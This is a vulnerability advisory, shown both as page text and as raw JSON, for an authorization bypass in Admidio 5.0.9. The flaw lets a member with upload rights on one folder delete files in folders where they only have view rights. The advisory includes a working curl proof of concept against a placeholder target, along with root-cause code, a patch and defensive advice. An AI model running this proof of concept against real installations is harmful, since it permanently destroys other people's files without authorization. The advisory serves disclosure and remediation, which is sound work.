GHSA-QC4C-HRMC-4F78

Vulnerability from github – Published: 2026-05-29 21:54 – Updated: 2026-06-09 10:35
VLAI
Summary
Admidio: Authorization bypass in file_delete enables cross-folder file removal by authenticated users without delete privileges
Details

Summary

An authenticated Admidio member with upload rights on any one folder can permanently delete files from folders where they have only view access. The authorization check at the top of modules/documents-files.php evaluates upload rights against the attacker-supplied folder_uuid URL parameter — not the file's actual parent folder. The file_delete handler then only verifies view rights on the file's real location, never upload rights. By passing a folder they legitimately own in folder_uuid while targeting a file in a restricted folder via file_uuid, an attacker bypasses the upload-right check entirely and permanently deletes the file.

This is an incomplete fix of GHSA-rmpj-3x5m-9m5f, which was patched in v5.0.7 but remains exploitable in v5.0.9.

Affected Version: Admidio v5.0.9


Details

Root Cause File: modules/documents-files.php

Issue 1 — folder_uuid is not required for file_delete mode (line 67):

$getFolderUUID = admFuncVariableIsValid($_GET, 'folder_uuid', 'uuid', array(
    'requireValue' => !in_array($getMode, array('list', 'file_delete', 'download'))
));

Issue 2 — The top-level upload-right check loads the folder from the attacker-controlled URL parameter, not the file's actual parent folder (lines 79–88):

if ($getMode != 'list' && $getMode != 'download') {
    $folder = new Folder($gDb);
    $folder->getFolderForDownload($getFolderUUID);   // uses attacker-supplied UUID
    if (!$folder->hasUploadRight()) {
        $gMessage->show($gL10n->get('SYS_NO_RIGHTS'));
    }
}

Issue 3 — The file_delete handler only checks view rights via getFileForDownload(). Upload rights on the file's actual folder are never verified (lines 165–178):

case 'file_delete':
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
    $file = new File($gDb);
    $file->getFileForDownload($getFileUUID);   // view-only check, not upload
    $file->delete();
    echo json_encode(array('status' => 'success'));
    break;

File::getFileForDownload() in src/Documents/Entity/File.php checks only view-role membership — it never verifies upload rights.


Attack Scenario

  1. The organization has two folders: PrivateFolder (role A: view-only) and UploadFolder (role A: upload + view).
  2. Attacker is a member of role A — they have legitimate upload access to UploadFolder only.
  3. Attacker enumerates a file UUID in PrivateFolder using file_list mode, which is accessible to anyone with view rights.
  4. Attacker sends a file_delete POST using UploadFolder's UUID in folder_uuid and the PrivateFolder file UUID in file_uuid.
  5. Server checks upload rights against UploadFolderpasses.
  6. Server deletes the file from PrivateFolder without ever checking upload rights there.

Prerequisites:

  • Authenticated Admidio member account
  • Upload rights on at least one folder (legitimately assigned)
  • View rights on the target folder (sufficient to enumerate file UUIDs via file_list mode)
  • Knowledge of a target file UUID (obtainable from the folder listing)

PoC

Step 1 — Authenticate and obtain login CSRF token:

curl -c /tmp/admidio_cookies.txt http://TARGET/system/login.php > /tmp/login.html

LOGIN_CSRF=$(grep -o 'name="adm_csrf_token"[^>]*value="[^"]*"' /tmp/login.html \
  | grep -o 'value="[^"]*"' | cut -d'"' -f2)

curl -b /tmp/admidio_cookies.txt -c /tmp/admidio_cookies.txt \
  -X POST "http://TARGET/system/login.php?mode=check" \
  -d "usr_login_name=MEMBER&usr_password=PASSWORD&adm_csrf_token=${LOGIN_CSRF}"

Step 2 — Extract authenticated session CSRF token:

AUTH_CSRF=$(curl -s -b /tmp/admidio_cookies.txt \
  "http://TARGET/system/file_upload.php?module=documents_files&uuid=UPLOAD_FOLDER_UUID" \
  | grep -oP 'name:\s*"adm_csrf_token",\s*value:\s*"\K[^"]+')

Step 3 — Delete file from restricted folder using the upload folder UUID as bypass:

curl -b /tmp/admidio_cookies.txt \
  -X POST "http://TARGET/modules/documents-files.php?mode=file_delete&file_uuid=PRIVATE_FILE_UUID&folder_uuid=UPLOAD_FOLDER_UUID" \
  -d "adm_csrf_token=${AUTH_CSRF}"

Expected response: {"status":"success"}

testmember holds upload rights only on UploadFolder. secret2.txt (UUID 93dc6280-...-bba7-...) resided in PrivateFolder and was permanently deleted from both the database and filesystem.


Impact

An authenticated Admidio member with legitimate upload access to any one folder can permanently delete files from any other folder to which they have view access — without authorization. In organizations where upload rights are delegated by role (e.g., team leads upload to their own folder, view-only everywhere else), this enables cross-folder sabotage and permanent destruction of shared documents.

Business Impact: Data loss, destruction of shared organizational documents, and compliance violations in organizations relying on Admidio for document management.


Remediation

In the file_delete handler, after loading the file via getFileForDownload(), verify upload rights against the file's actual parent folder — not the URL-supplied folder_uuid:

case 'file_delete':
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
    $file = new File($gDb);
    $file->getFileForDownload($getFileUUID);
    // Verify upload rights on the file's actual parent folder
    $parentFolder = new Folder($gDb);
    $parentFolder->readDataById((int)$file->getValue('fil_fol_id'));
    if (!$parentFolder->hasUploadRight()) {
        $gMessage->show($gL10n->get('SYS_NO_RIGHTS'));
    }
    $file->delete();
    echo json_encode(array('status' => 'success'));
    break;

Alternative fix: Remove the top-level folder_uuid check for file_delete entirely and move a proper upload-rights verification into the file_delete case as the sole authority for authorization.

Defense-in-depth recommendations:

  • Audit all other modes in documents-files.php (e.g., folder_delete, file_rename) for the same pattern of trusting folder_uuid from the URL instead of the resource's actual parent.
  • Add an integration test asserting a user with upload rights on Folder A cannot perform destructive operations on files in Folder B.
  • Consider centralizing authorization in a single helper (e.g., assertUploadRightOnFile($fileUuid)) to eliminate the URL-parameter trust-boundary issue across the codebase.

Credits

  • Researcher: Vishal Kumar B - https://github.com/VishaaLlKumaaRr - Security Researcher & Penetration Tester
  • Disclosure: Responsible disclosure to Admidio maintainers

References

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.0.9"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "admidio/admidio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.0.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47226"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-29T21:54:09Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nAn authenticated Admidio member with upload rights on **any one folder** can permanently delete files from folders where they have only view access. The authorization check at the top of `modules/documents-files.php` evaluates upload rights against the attacker-supplied `folder_uuid` URL parameter \u2014 not the file\u0027s actual parent folder. The `file_delete` handler then only verifies view rights on the file\u0027s real location, never upload rights. By passing a folder they legitimately own in `folder_uuid` while targeting a file in a restricted folder via `file_uuid`, an attacker bypasses the upload-right check entirely and permanently deletes the file.\n\nThis is an **incomplete fix** of [GHSA-rmpj-3x5m-9m5f](https://github.com/Admidio/admidio/security/advisories/GHSA-rmpj-3x5m-9m5f), which was patched in v5.0.7 but remains exploitable in v5.0.9.\n\n**Affected Version:** Admidio v5.0.9 \n\n---\n\n### Details\n\n**Root Cause File:** `modules/documents-files.php`\n\n**Issue 1 \u2014 `folder_uuid` is not required for `file_delete` mode (line 67):**\n\n```php\n$getFolderUUID = admFuncVariableIsValid($_GET, \u0027folder_uuid\u0027, \u0027uuid\u0027, array(\n    \u0027requireValue\u0027 =\u003e !in_array($getMode, array(\u0027list\u0027, \u0027file_delete\u0027, \u0027download\u0027))\n));\n```\n\n**Issue 2 \u2014 The top-level upload-right check loads the folder from the attacker-controlled URL parameter, not the file\u0027s actual parent folder (lines 79\u201388):**\n\n```php\nif ($getMode != \u0027list\u0027 \u0026\u0026 $getMode != \u0027download\u0027) {\n    $folder = new Folder($gDb);\n    $folder-\u003egetFolderForDownload($getFolderUUID);   // uses attacker-supplied UUID\n    if (!$folder-\u003ehasUploadRight()) {\n        $gMessage-\u003eshow($gL10n-\u003eget(\u0027SYS_NO_RIGHTS\u0027));\n    }\n}\n```\n\n**Issue 3 \u2014 The `file_delete` handler only checks view rights via `getFileForDownload()`. Upload rights on the file\u0027s actual folder are never verified (lines 165\u2013178):**\n\n```php\ncase \u0027file_delete\u0027:\n    SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n    $file = new File($gDb);\n    $file-\u003egetFileForDownload($getFileUUID);   // view-only check, not upload\n    $file-\u003edelete();\n    echo json_encode(array(\u0027status\u0027 =\u003e \u0027success\u0027));\n    break;\n```\n\n`File::getFileForDownload()` in `src/Documents/Entity/File.php` checks only view-role membership \u2014 it never verifies upload rights.\n\n---\n\n### Attack Scenario\n\n1. The organization has two folders: `PrivateFolder` (role A: view-only) and `UploadFolder` (role A: upload + view).\n2. Attacker is a member of role A \u2014 they have legitimate upload access to `UploadFolder` only.\n3. Attacker enumerates a file UUID in `PrivateFolder` using `file_list` mode, which is accessible to anyone with view rights.\n4. Attacker sends a `file_delete` POST using `UploadFolder`\u0027s UUID in `folder_uuid` and the `PrivateFolder` file UUID in `file_uuid`.\n5. Server checks upload rights against `UploadFolder` \u2192 **passes**.\n6. Server deletes the file from `PrivateFolder` **without ever checking upload rights there**.\n\n**Prerequisites:**\n\n- Authenticated Admidio member account\n- Upload rights on at least one folder (legitimately assigned)\n- View rights on the target folder (sufficient to enumerate file UUIDs via `file_list` mode)\n- Knowledge of a target file UUID (obtainable from the folder listing)\n\n---\n\n### PoC\n\n**Step 1 \u2014 Authenticate and obtain login CSRF token:**\n\n```bash\ncurl -c /tmp/admidio_cookies.txt http://TARGET/system/login.php \u003e /tmp/login.html\n\nLOGIN_CSRF=$(grep -o \u0027name=\"adm_csrf_token\"[^\u003e]*value=\"[^\"]*\"\u0027 /tmp/login.html \\\n  | grep -o \u0027value=\"[^\"]*\"\u0027 | cut -d\u0027\"\u0027 -f2)\n\ncurl -b /tmp/admidio_cookies.txt -c /tmp/admidio_cookies.txt \\\n  -X POST \"http://TARGET/system/login.php?mode=check\" \\\n  -d \"usr_login_name=MEMBER\u0026usr_password=PASSWORD\u0026adm_csrf_token=${LOGIN_CSRF}\"\n```\n\n**Step 2 \u2014 Extract authenticated session CSRF token:**\n\n```bash\nAUTH_CSRF=$(curl -s -b /tmp/admidio_cookies.txt \\\n  \"http://TARGET/system/file_upload.php?module=documents_files\u0026uuid=UPLOAD_FOLDER_UUID\" \\\n  | grep -oP \u0027name:\\s*\"adm_csrf_token\",\\s*value:\\s*\"\\K[^\"]+\u0027)\n```\n\n**Step 3 \u2014 Delete file from restricted folder using the upload folder UUID as bypass:**\n\n```bash\ncurl -b /tmp/admidio_cookies.txt \\\n  -X POST \"http://TARGET/modules/documents-files.php?mode=file_delete\u0026file_uuid=PRIVATE_FILE_UUID\u0026folder_uuid=UPLOAD_FOLDER_UUID\" \\\n  -d \"adm_csrf_token=${AUTH_CSRF}\"\n```\n\n**Expected response:** `{\"status\":\"success\"}`\n\n`testmember` holds upload rights **only** on `UploadFolder`. `secret2.txt` (UUID `93dc6280-...-bba7-...`) resided in `PrivateFolder` and was permanently deleted from both the database and filesystem.\n\n---\n\n### Impact\n\nAn authenticated Admidio member with legitimate upload access to **any one folder** can permanently delete files from **any other folder** to which they have view access \u2014 without authorization. In organizations where upload rights are delegated by role (e.g., team leads upload to their own folder, view-only everywhere else), this enables cross-folder sabotage and permanent destruction of shared documents.\n\n**Business Impact:** Data loss, destruction of shared organizational documents, and compliance violations in organizations relying on Admidio for document management.\n\n---\n\n### Remediation\n\nIn the `file_delete` handler, after loading the file via `getFileForDownload()`, verify upload rights against the file\u0027s **actual parent folder** \u2014 not the URL-supplied `folder_uuid`:\n\n```php\ncase \u0027file_delete\u0027:\n    SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n    $file = new File($gDb);\n    $file-\u003egetFileForDownload($getFileUUID);\n    // Verify upload rights on the file\u0027s actual parent folder\n    $parentFolder = new Folder($gDb);\n    $parentFolder-\u003ereadDataById((int)$file-\u003egetValue(\u0027fil_fol_id\u0027));\n    if (!$parentFolder-\u003ehasUploadRight()) {\n        $gMessage-\u003eshow($gL10n-\u003eget(\u0027SYS_NO_RIGHTS\u0027));\n    }\n    $file-\u003edelete();\n    echo json_encode(array(\u0027status\u0027 =\u003e \u0027success\u0027));\n    break;\n```\n\n**Alternative fix:** Remove the top-level `folder_uuid` check for `file_delete` entirely and move a proper upload-rights verification into the `file_delete` case as the sole authority for authorization.\n\n**Defense-in-depth recommendations:**\n\n- Audit all other modes in `documents-files.php` (e.g., `folder_delete`, `file_rename`) for the same pattern of trusting `folder_uuid` from the URL instead of the resource\u0027s actual parent.\n- Add an integration test asserting a user with upload rights on Folder A cannot perform destructive operations on files in Folder B.\n- Consider centralizing authorization in a single helper (e.g., `assertUploadRightOnFile($fileUuid)`) to eliminate the URL-parameter trust-boundary issue across the codebase.\n\n---\n\n### Credits\n\n- Researcher: Vishal Kumar B - https://github.com/VishaaLlKumaaRr - Security Researcher \u0026 Penetration Tester\n- Disclosure: Responsible disclosure to Admidio maintainers\n\n---\n\n### References\n\n- [GHSA-rmpj-3x5m-9m5f](https://github.com/Admidio/admidio/security/advisories/GHSA-rmpj-3x5m-9m5f) \u2014 Prior incomplete fix, patched in v5.0.7\n- [CWE-862: Missing Authorization](https://cwe.mitre.org/data/definitions/862.html)\n- [CWE-639: Authorization Bypass Through User-Controlled Key](https://cwe.mitre.org/data/definitions/639.html)",
  "id": "GHSA-qc4c-hrmc-4f78",
  "modified": "2026-06-09T10:35:01Z",
  "published": "2026-05-29T21:54:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-qc4c-hrmc-4f78"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-rmpj-3x5m-9m5f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Admidio/admidio"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Admidio: Authorization bypass in file_delete enables cross-folder file removal by authenticated users without delete privileges"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…